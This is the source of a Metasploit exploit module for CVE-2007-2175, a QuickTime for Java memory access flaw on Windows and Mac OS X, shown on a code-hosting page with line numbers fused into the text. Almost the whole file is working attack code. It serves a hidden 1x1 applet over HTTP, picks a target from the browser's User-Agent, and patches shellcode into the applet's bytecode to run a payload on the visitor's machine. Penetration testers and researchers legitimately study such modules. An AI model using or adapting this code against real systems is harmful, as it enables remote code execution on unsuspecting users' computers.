Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/multi/browser/qtjava_pointer.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78#9# This module acts as an HTTP server10#11include Msf::Exploit::Remote::HttpServer::HTML1213def initialize(info = {})14super(update_info(info,15'Name' => 'Apple QTJava toQTPointer() Arbitrary Memory Access',16'Description' => %q{17This module exploits an arbitrary memory access vulnerability in the18Quicktime for Java API provided with Quicktime 7.1920},21'License' => MSF_LICENSE,22'Author' =>23[24'hdm', # Original exploit for Mac OS X PPC / Win3225'kf', # Added support for Mac OS X X8626'ddz' # Discovered bug, provided tips27],28'References' =>29[30['CVE', '2007-2175'],31['OSVDB', '34178'],32['BID', '23608'],33['ZDI', '07-023'],34],35'Payload' =>36{37'Space' => 1024,38'BadChars' => ''39},40'Platform' => %w{ win osx },41'Targets' =>42[43#44# Problem with generic payloads + regenerate_payload still :(45#46# [ 'Quicktime 7 Automatic',47# {48# 'Platform' => ['win', 'osx'],49# 'Arch' => [ARCH_X86, ARCH_PPC]50# }51# ],52[ 'Quicktime 7 on Windows x86',53{54'Platform' => 'win',55'Arch' => ARCH_X8656}57],58[ 'Quicktime 7 on Mac OS X PPC',59{60'Platform' => 'osx',61'Arch' => ARCH_PPC,62}63],64[ 'Quicktime 7 on Mac OS X x86',65{66'Platform' => 'osx',67'Arch' => ARCH_X86,68}69],70],71# 'DefaultTarget' => 0,72'DisclosureDate' => '2007-04-23'73))74end757677def exploit78# load the class data79path = File.join(Msf::Config.data_directory, "exploits", "QTJavaExploit.class")80fd = File.open(path, "rb")81@class_data = fd.read(fd.stat.size)82fd.close8384super85end868788def on_request_uri(cli, req)8990# Create a cached mapping between IP and detected target91@targetcache ||= {}92@targetcache[cli.peerhost] ||= {}93@targetcache[cli.peerhost][:update] = Time.now.to_i9495if (target.name =~ /Automatic/)96case req.headers['User-Agent']97when /Windows/i98print_status("Choosing a Windows target")99@targetcache[cli.peerhost][:target] = self.targets[1]100when /PPC Mac OS X/i101print_status("Choosing a Mac OS X PPC target")102@targetcache[cli.peerhost][:target] = self.targets[2]103when /Intel Mac OS X/i104print_status("Choosing a Mac OS X x86 target")105@targetcache[cli.peerhost][:target] = self.targets[3]106end107end108109# Clean the cache110rmq = []111@targetcache.each_key do |addr|112if (Time.now.to_i > @targetcache[addr][:update]+60)113rmq.push addr114end115end116117rmq.each {|addr| @targetcache.delete(addr) }118119120# Request processing121122if (not req.uri.match(/\.class$/i))123124# Redirect to the base directory so the applet code loads...125if (not req.uri.match(/\/$/))126send_redirect(cli, get_resource() + '/', '')127return128end129130# Display the applet loading HTML131print_status("Sending HTML")132send_response_html(cli, generate_html(), { 'Content-Type' => 'text/html' })133return134end135136# Send the actual applet over137print_status("Sending applet")138send_response(cli, generate_applet(cli, req), { 'Content-Type' => 'application/octet-stream' })139140# Handle the payload141handler(cli)142end143144def generate_html()145return "<html><head></head><body><applet width='1' height='1' code='QTJavaExploit.class'></applet></body></html>"146end147148def generate_applet(cli, req)149150this_target = nil151if (target.name =~ /Automatic/)152if (@targetcache[cli.peerhost][:target])153this_target = @targetcache[cli.peerhost][:target]154else155return ''156end157else158this_target = target159end160161# make a copy..162data = @class_data.dup163164# 1 = OSX PPC, 2 = OSX X86, 3 = WIN X86165idx_targ = data.index("\x03\x10\xcc\x54")166167# 1024 bytes for shellcode168idx_code = data.index("\x03\x10\xf0\x54")169170# Handle Mac OS X PPC171if (this_target.arch.include?(ARCH_PPC))172tp = regenerate_payload(cli, 'osx', ARCH_PPC, this_target)173data = patch_bytecode(idx_code, data, tp.encoded)174data = patch_bytecode(idx_targ, data, "\x01")175end176177# Handle Mac OS X x86 / Windows x86178if (this_target.arch.include?(ARCH_X86))179180if (this_target.platform.platforms.include?(Msf::Module::Platform::Windows))181tp = regenerate_payload(cli, 'win', ARCH_X86, this_target)182data = patch_bytecode(idx_code, data, tp.encoded)183data = patch_bytecode(idx_targ, data, "\x03")184end185186if (this_target.platform.platforms.include?(Msf::Module::Platform::OSX))187tp = regenerate_payload(cli, 'osx', ARCH_X86, this_target)188data = patch_bytecode(idx_code, data, tp.encoded)189data = patch_bytecode(idx_targ, data, "\x02")190end191end192193return data194end195196def patch_bytecode(off, data, buff)197198cnt = 0199off -= 1200while (cnt < buff.length)201cnt += 1202while (! (data[off-1] == 0x10 && data[off+1] == 0x54))203off += 1204end205data[off]=buff[cnt-1]206off += 1207end208209return data210end211212213end214215216